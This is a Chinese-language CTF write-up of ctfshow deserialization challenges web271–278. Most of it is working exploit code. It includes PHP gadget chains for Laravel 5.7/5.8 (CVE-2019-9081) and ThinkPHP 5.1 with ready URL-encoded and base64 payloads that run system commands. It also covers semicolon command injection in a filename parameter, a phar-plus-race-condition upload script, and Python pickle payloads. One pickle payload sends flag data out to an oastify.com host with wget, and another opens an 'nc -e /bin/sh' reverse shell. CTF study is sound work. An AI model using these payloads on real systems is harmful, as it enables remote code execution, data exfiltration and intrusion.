目录
1、web271
2、web272
3、web273
4、web274
5、web275
6、web276
7、web277
8、web278
laravel 反序列化漏洞
1、web271
laravel 5.7(CVE-2019-9081)
poc
<?php
namespace Illuminate\Foundation\Testing{
use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;
class PendingCommand
{
protected $command;
protected $parameters;
public $test;
protected $app;
public function __construct(){
$this->command="system";
$this->parameters[]="cat /flag";
$this->test=new GenericUser();
$this->app=new Application();
}
}
}
namespace Illuminate\Foundation{
class Application{
protected $bindings = [];
public function __construct(){
$this->bindings=array(
'Illuminate\Contracts\Console\Kernel'=>array(
'concrete'=>'Illuminate\Foundation\Application'
)
);
}
}
}
namespace Illuminate\Auth{
class GenericUser
{
protected $attributes;
public function __construct(){
$this->attributes['expectedOutput']=['hello','world'];
$this->attributes['expectedQuestions']=['hello','world'];
}
}
}
namespace{
use Illuminate\Foundation\Testing\PendingCommand;
echo urlencode(serialize(new PendingCommand()));
}
payload:
data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7D%7D
2、web272
Laravel 5.8(CVE-2019-9081)
poc
<?php
namespace Illuminate\Broadcasting{
use Illuminate\Bus\Dispatcher;
use Illuminate\Foundation\Console\QueuedCommand;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct(){
$this->events=new Dispatcher();
$this->event=new QueuedCommand();
}
}
}
namespace Illuminate\Foundation\Console{
class QueuedCommand
{
public $connection="cat /flag";
}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver="system";
}
}
namespace{
use Illuminate\Broadcasting\PendingBroadcast;
echo urlencode(serialize(new PendingBroadcast()));
}payload:
data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D
3、web273
Laravel 5.8(CVE-2019-9081)
web272 的 payload:
data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D
4、web274
ThinkPHP V5.1
exp
<?php
namespace think;
abstract class Model{
protected $append = [];
private $data = [];
public function __construct()
{
$this->append = ["li"=>[]];
$this->data = ["li"=>new Request()];
}
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows{
private $files = [];
public function __construct()
{
$this->files = [new Pivot()];
}
}
namespace think\model;
use think\model;
class Pivot extends Model{
}
namespace think;
class Request{
protected $hook = [];
protected $filter;
protected $config;
protected $param = [];
public function __construct()
{
$this->hook = ["visible"=>[$this,"isAjax"]];
$this->filter = 'system';
$this->config = ["var_ajax"=>''];
$this->param = ['cat /f*'];
}
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>payload:
?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJsaSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoibGkiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6NztpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fXM6ODoiACoAcGFyYW0iO2E6MTp7aTowO3M6NzoiY2F0IC9mKiI7fX19fX19
5、web275
system('rm '.$this->filename);filename 可控,使用分号截断实现命令执行
?fn=1.php;ls;
读取 flag.php
?fn=1.php;tac flag.php;
拿到 flag:ctfshow{28fb8db5-7e60-4876-9079-f4e64554eb77}
6、web276
新增对 admin 的判断
public $admin = false; admin 默认是 false ,我们需要修改它为 true 才会进入 system。
但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化 manifest 中的字符串,采用 phar 协议来读取即可。
生成 phar 文件:
<?php
class filter{
public $filename = "1.php;tac f*;";
public $filecontent;
public $evilfile = true;
public $admin = true;
}
$o = new filter();
$phar = new Phar("my.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("my.txt", "my");
$phar->stopBuffering();
?>这里还需要结合条件竞争,因为我们写入的这个 phar 文件会被删除,我们需要在它还没有被删除前访问到它,触发反序列化。
exp:
import threading
import requests
url = "http://882d7c83-d5eb-4fec-abd6-3eca2abc1283.challenge.ctf.show/"
content = open("my.phar", "rb").read()
found_flag = False
def upload():
requests.post(url=url + "?fn=my.phar", data=content)
def read():
global found_flag
response = requests.post(url=url + "?fn=phar://my.phar/", data="1")
if "ctfshow{" in response.text or "flag{" in response.text:
print(response.text)
found_flag = True
while not found_flag:
threading.Thread(target=upload).start()
threading.Thread(target=read).start()
拿到 flag:ctfshow{99e96faa-80bf-4ba6-b915-dfbdccf5067a}
7、web277
python 反序列化
import os
import pickle
import base64
class RCE(object):
def __reduce__(self):
return (os.popen, ('wget il7p6a9q8k2lxm0uh96ux3uif9l09rxg.oastify.com?1=`cat f*`',))
print(base64.b64encode(pickle.dumps(RCE())))结合 bp 的 Collaborator 模块外带
payload:
backdoor?data=gASVUwAAAAAAAACMAm9zlIwFcG9wZW6Uk5SMPHdnZXQgaWw3cDZhOXE4azJseG0wdWg5NnV4M3VpZjlsMDlyeGcub2FzdGlmeS5jb20/MT1gY2F0IGYqYJSFlFKULg==
拿到 flag:ctfshow{2d4f0ae3-dc87-4c9d-b054-9e563bc3886a}
也可以反弹 shell
import pickle
import base64
class cmd():
def __reduce__(self):
return (eval,("__import__('os').popen('nc ip port -e /bin/sh').read()",))
c = cmd()
c = pickle.dumps(c)
print(base64.b64encode(c))
8、web278
过滤了 os.system,方法同上
